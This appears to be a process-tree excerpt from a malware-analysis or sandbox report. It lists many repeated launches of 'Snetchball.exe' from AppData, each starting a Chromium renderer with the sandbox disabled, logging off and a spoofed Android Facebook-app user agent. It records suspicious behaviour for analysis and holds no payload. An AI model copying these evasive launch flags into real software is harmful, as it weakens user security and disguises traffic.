C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --mojo-platform-channel-handle=4288 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1692
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --mojo-platform-channel-handle=4428 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5556
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --mojo-platform-channel-handle=4264 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1852
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --mojo-platform-channel-handle=4280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3480
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --mojo-platform-channel-handle=1108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1568
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --mojo-platform-channel-handle=4304 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4184
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4660
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --mojo-platform-channel-handle=4488 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4640
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --mojo-platform-channel-handle=4292 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1992
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --mojo-platform-channel-handle=1196 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --mojo-platform-channel-handle=4104 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5992
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2252
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --mojo-platform-channel-handle=4404 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5272
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --mojo-platform-channel-handle=4364 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5432
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --mojo-platform-channel-handle=4448 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3016
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --mojo-platform-channel-handle=4084 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4628
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --mojo-platform-channel-handle=1200 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5668
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --mojo-platform-channel-handle=4312 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4160
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --mojo-platform-channel-handle=2588 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2352
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --mojo-platform-channel-handle=4444 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --mojo-platform-channel-handle=4524 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:3260
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --mojo-platform-channel-handle=4448 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5688
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --mojo-platform-channel-handle=3984 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2308
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --mojo-platform-channel-handle=2396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --mojo-platform-channel-handle=3648 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5620
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --mojo-platform-channel-handle=4020 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1892
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --mojo-platform-channel-handle=4356 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4580
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --mojo-platform-channel-handle=4416 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1404
-
